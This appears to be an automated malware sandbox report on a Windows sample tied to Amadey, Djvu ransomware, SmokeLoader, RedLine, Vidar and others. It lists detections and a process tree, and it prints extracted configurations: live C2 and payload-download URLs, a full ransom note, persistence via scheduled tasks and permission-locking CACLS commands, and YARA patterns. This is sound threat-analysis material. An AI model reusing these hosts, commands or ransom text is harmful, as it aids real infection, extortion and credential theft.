Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1325280
MD5:	178ae4687ee8a5761d2003dfd45efdce
SHA1:	23fbe6bb9b67eb068b746b1518da3c3b91c5e219
SHA256:	9f6b062d11dfeb51158b9d133c7ad76051dfef5678f6af292e87dd464c6aa50f
Tags:	exe
Infos:

Detection

Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Found ransom note / readme

Yara detected Babuk Ransomware

Yara detected SmokeLoader

Yara detected Glupteba

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Found Tor onion address

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Allocates memory in foreign processes

Modifies existing user documents (likely ransomware behavior)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Deletes itself after installation

Writes a notice file (html or txt) to demand a ransom

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Creates HTML files with .exe extension (expired dropper behavior)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

May check the online IP address of the machine

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Uses cacls to modify the permissions of files

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

file.exe (PID: 6784 cmdline: C:\Users\user\Desktop\file.exe MD5: 178AE4687EE8A5761D2003DFD45EFDCE)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

958B.exe (PID: 3636 cmdline: C:\Users\user\AppData\Local\Temp\958B.exe MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

958B.exe (PID: 4708 cmdline: C:\Users\user\AppData\Local\Temp\958B.exe MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

icacls.exe (PID: 5340 cmdline: icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

958B.exe (PID: 3292 cmdline: "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

958B.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

build2.exe (PID: 4712 cmdline: "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe" MD5: 22F2FD94F57B71F36A31EA18BE7D4B34)

build2.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe" MD5: 22F2FD94F57B71F36A31EA18BE7D4B34)

A079.exe (PID: 6364 cmdline: C:\Users\user\AppData\Local\Temp\A079.exe MD5: 021EC43150E8C4A615EE09E166D71367)

conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppLaunch.exe (PID: 2352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

WerFault.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)

regsvr32.exe (PID: 1524 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\A9E0.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 6132 cmdline: /s C:\Users\user\AppData\Local\Temp\A9E0.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

C5F5.exe (PID: 5996 cmdline: C:\Users\user\AppData\Local\Temp\C5F5.exe MD5: 55F845C433E637594AAF872E41FDA207)

yiueea.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" MD5: 55F845C433E637594AAF872E41FDA207)

schtasks.exe (PID: 3628 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "user:N"&&CACLS "yiueea.exe" /P "user:R" /E&&echo Y|CACLS "..\577f58beff" /P "user:N"&&CACLS "..\577f58beff" /P "user:R" /E&&Exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 180 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cacls.exe (PID: 6404 cmdline: CACLS "yiueea.exe" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

cacls.exe (PID: 6176 cmdline: CACLS "yiueea.exe" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

cmd.exe (PID: 6004 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cacls.exe (PID: 6468 cmdline: CACLS "..\577f58beff" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

cacls.exe (PID: 6084 cmdline: CACLS "..\577f58beff" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

958B.exe (PID: 4416 cmdline: "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

958B.exe (PID: 4280 cmdline: "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

F3CC.exe (PID: 2468 cmdline: C:\Users\user\AppData\Local\Temp\F3CC.exe MD5: F5B8B275A0CAFBA82D26D3725CBA78C3)

2899.exe (PID: 4208 cmdline: C:\Users\user\AppData\Local\Temp\2899.exe MD5: 0E9A9AD0E4EBD15E6071E303C58B0671)

958B.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

5DA4.exe (PID: 2796 cmdline: C:\Users\user\AppData\Local\Temp\5DA4.exe MD5: FF43AAE7083352DC2D8251C1E622C737)

cmd.exe (PID: 6184 cmdline: cmd /c tlatest.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vusretg (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\vusretg MD5: 178AE4687EE8A5761D2003DFD45EFDCE)

958B.exe (PID: 5664 cmdline: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

958B.exe (PID: 3648 cmdline: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task MD5: C2AB34E22731EDA5D7BE4450C6D8360F)

yiueea.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe MD5: 55F845C433E637594AAF872E41FDA207)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199560322242", "https://t.me/cahalgo"], "Botnet": "d37c48c18c73cc0e155c7e1dfde06db9"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://kumbuyartyty.net/", "http://criogetikfenbut.org/", "http://stualialuyastrelia.net/", "http://onualituyrs.org/", "http://sumagulituyo.org/", "http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}

Threatname: Djvu

{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xN3VuzQl0a\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0805JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtLOKZqYIvkJIWXq55iKX\\\\nFSyHISS5lLAepLCyW\\/5rGg4Tqm8Tp32mBoRd1gWhOrk\\/ad\\/RtT8UZZWKtG7WAPYq\\\\nBi+W\\/F9byiJmuk\\/SZReEIvErzorAXPnEkwd6dyK5RmAcI+H+FNyKR\\/2y93j4Omif\\\\nWIfNwbUwgK6OpTQ9klCoKp0rprygGCBkspK+r3KlGY3vnmAxPpI9CxKIaKTHApL2\\\\n61iRvEswISjNztuIPKsh0GVc09hX+NSQUQu01U4KU8bWARNQTRwTutPQl\\/5EXpIb\\\\neh9\\/JUJDreLRJ0vZPX3O59tf0FvGHb9UJHtIrs0L6fjhwa2fXEBwn7\\/3QedQ0s2K\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: Amadey

{"C2 url": "79.137.192.18/9bDc8sQ/index.php", "Version": "3.87"}

Threatname: RedLine

{"C2 url": "51.255.152.132:36011", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x4fe161:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
C:\Users\user\AppData\Local\Temp\C5F5.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\C5F5.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56

Memory Dumps

Source	Rule	Description	Author	Strings
00000026.00000003.2734778264.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002C.00000002.2964943607.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000017.00000002.4503622640.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000025.00000002.2729815222.00000000006BB000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000000E.00000002.2663695753.0000000002306000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7400:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000026.00000002.2802563132.0000000000730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002A.00000002.2774337938.000000000256D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x11d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x644:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6c1f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
